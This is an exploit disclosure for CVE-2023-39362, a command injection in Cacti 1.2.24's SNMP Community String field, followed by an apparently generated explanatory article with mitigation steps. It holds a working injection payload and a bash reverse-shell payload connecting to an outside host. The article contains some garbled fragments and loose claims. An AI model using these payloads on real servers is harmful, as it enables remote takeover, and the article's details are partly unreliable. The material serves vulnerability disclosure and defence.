Cacti 1.2.24 - Authenticated command injection when using SNMP options

Exploit Author: Antonio Francesco Sardella Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2023-10-09 
# Exploit Title: Cacti 1.2.24 - Authenticated command injection when using SNMP options
# Date: 2023-07-03
# Exploit Author: Antonio Francesco Sardella
# Vendor Homepage: https://www.cacti.net/
# Software Link: https://www.cacti.net/info/downloads
# Version: Cacti 1.2.24
# Tested on: Cacti 1.2.24 installed on 'php:7.4.33-apache' Docker container
# CVE: CVE-2023-39362
# Category: WebApps
# Original Security Advisory: https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp
# Example Vulnerable Application: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application
# Vulnerability discovered and reported by: Antonio Francesco Sardella

=======================================================================================
Cacti 1.2.24 - Authenticated command injection when using SNMP options (CVE-2023-39362)
=======================================================================================

-----------------
Executive Summary
-----------------

In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server.

-------
Exploit
-------

Prerequisites:
    - The attacker is authenticated.
    - The privileges of the attacker allow to manage Devices and/or Graphs, e.g., "Sites/Devices/Data", "Graphs".
    - A Device that supports SNMP can be used.
    - Net-SNMP Graphs can be used.
    - snmp module of PHP is not installed.

Example of an exploit:
    - Go to "Console" > "Create" > "New Device".
    - Create a Device that supports SNMP version 1 or 2.
    - Ensure that the Device has Graphs with one or more templates of:
        - "Net-SNMP - Combined SCSI Disk Bytes"
        - "Net-SNMP - Combined SCSI Disk I/O"
        - (Creating the Device from the template "Net-SNMP Device" will satisfy the Graphs prerequisite)
    - In the "SNMP Options", for the "SNMP Community String" field, use a value like this:
        public\' ; touch /tmp/m3ssap0 ; \'
    - Click the "Create" button.
    - Check under /tmp the presence of the created file.

To obtain a reverse shell, a payload like the following can be used.

    public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'

A similar exploit can be used editing an existing Device, with the same prerequisites, and waiting for the poller to run. It could be necessary to change the content of the "Downed Device Detection" field under the "Availability/Reachability Options" section with an item that doesn't involve SNMP (because the malicious payload could break the interaction with the host).

----------
Root Cause
----------

A detailed root cause of the vulnerability is available in the original security advisory (https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp) or in my blog post (https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html).

----------
References
----------

    - https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp
    - https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html
    - https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application


Cacti 1.2.24 Authenticated Command Injection via SNMP Options: A Deep Dive into CVE-2023-39362

Security vulnerabilities in open-source monitoring tools like Cacti can have far-reaching consequences, especially when they enable authenticated command injection—a critical flaw that allows attackers to execute arbitrary system commands on the underlying server. The CVE-2023-39362 vulnerability in Cacti 1.2.24 exemplifies how a seemingly innocuous configuration field can become a backdoor for remote code execution.

Understanding the Vulnerability: Authenticated Command Injection in SNMP Options

Cacti is a widely used web-based network monitoring and graphing tool that leverages SNMP (Simple Network Management Protocol) to collect performance data from devices. While SNMP is inherently secure when properly configured, the way Cacti handles SNMP options—particularly the Community String field—introduces a dangerous flaw.

When an authenticated user with privileges to manage devices or graphs modifies the SNMP Community String, the application fails to properly sanitize input before passing it to system-level commands. This oversight leads to command injection, where malicious strings containing shell metacharacters (like ;, ', or ;) are interpreted as executable commands by the underlying OS.

Crucially, this vulnerability is authenticated, meaning attackers must first gain access to a Cacti instance with sufficient permissions—typically roles such as Site Administrator or Graph Manager. However, once inside, they can exploit the SNMP configuration to escalate privileges or gain full remote code execution.

Prerequisites for Exploitation

Exploiting CVE-2023-39362 requires several conditions to be met:

  • Authenticated access to the Cacti web interface.
  • Privileges to manage devices or create graphs, such as those in the Sites/Devices/Data or Graphs sections.
  • A device configured to use SNMP v1 or v2 (v3 is not affected due to different handling).
  • Graph templates that rely on Net-SNMP (e.g., "Net-SNMP - Combined SCSI Disk Bytes" or "Net-SNMP - Combined SCSI Disk I/O").
  • PHP snmp module not installed—this is a key condition. If the snmp extension is enabled, Cacti uses native PHP functions, which are more secure. When disabled, Cacti falls back to system calls, making it vulnerable.

Exploitation Example: Creating a Malicious Device

Here is a real-world exploit scenario using a vulnerable Cacti 1.2.24 instance running in a php:7.4.33-apache Docker container:


public\' ; touch /tmp/m3ssap0 ; \'

This string is injected into the SNMP Community String field during device creation. Let’s break it down:

  • public\' — The first part of the string, which appears to be a valid SNMP community.
  • ; — A shell command separator that allows execution of subsequent commands.
  • touch /tmp/m3ssap0 — A benign command to create a file in the /tmp directory, used as a proof-of-concept.
  • ; — Another command separator.
  • \' — A closing quote to balance the input, preventing syntax errors in the command chain.

When the device is saved, Cacti uses the community string in a system call (e.g., via snmpget or snmpwalk), but due to insufficient sanitization, the entire string is passed to the shell without escaping. The result? The command touch /tmp/m3ssap0 is executed as a system command, creating a file on the host.

Advanced Exploitation: Reverse Shell Payload

For full control over the server, an attacker can use a reverse shell payload:


public\' ; bash -c "exec bash -i &>/dev/tcp/192.168.1.100/4444 <&1" ; \'

This payload leverages the bash -c command to execute a reverse shell. Here’s what happens:

  • exec bash -i — Starts an interactive bash shell.
  • &>/dev/tcp/192.168.1.100/4444 — Redirects both stdin and stdout to a TCP connection to a listener at 192.168.1.100 on port 4444.
  • <&1 — Redirects stdin from the same connection, enabling bidirectional communication.

If the attacker has a netcat listener running on the specified IP and port, they will receive a shell session directly from the Cacti server, allowing full access to the underlying system.

Why This Vulnerability Exists: Root Cause Analysis

The root cause lies in Cacti’s reliance on external system commands when the snmp PHP extension is not installed. Instead of using secure, sandboxed PHP functions, Cacti invokes shell commands like snmpget or snmpwalk with user-provided input.

During the device creation or graph polling process, the SNMP Community String is passed directly into the command line without proper escaping or validation. This creates a classic command injection vector.

As noted in the original advisory (GHSA-g6ff-58cj-x3cp), Cacti developers failed to implement input sanitization and shell escaping, especially in contexts where the PHP snmp module is absent. This is a critical oversight because it assumes the environment is safe, but in reality, many deployments—especially Docker-based ones—may lack the snmp extension.

Real-World Impact and Mitigation

Given that Cacti is commonly deployed in enterprise monitoring environments, this vulnerability can lead to:

  • Unauthorized access to sensitive network data.
  • Privilege escalation from a low-level user to root.
  • Exfiltration of configuration files, credentials, or logs.
  • Installation of backdoors or persistence mechanisms.

Immediate Mitigation Steps:

  • Upgrade to Cacti 1.2.25 or later—the vendor has patched this issue.
  • Ensure the PHP snmp module is installed—this prevents fallback to vulnerable system calls.
  • Implement strict role-based access control—limit device/graph management to trusted users.
  • Disable SNMP v1/v2—use SNMP v3 with authentication and encryption.
  • Monitor system logs—look for unexpected command executions or file creations.

Security Best Practices for Cacti Administrators

Security hardening should be proactive. Here’s a checklist for administrators:

<td
Practice Recommendation
PHP Extensions Always install the snmp module. Use php -m | grep snmp to verify.
SNMP Version Disable SNMP v1 and v2; enforce SNMP v3 with strong authentication.
Input Validation Implement custom validation for SNMP fields—reject non-alphanumeric strings with special characters.
Access Control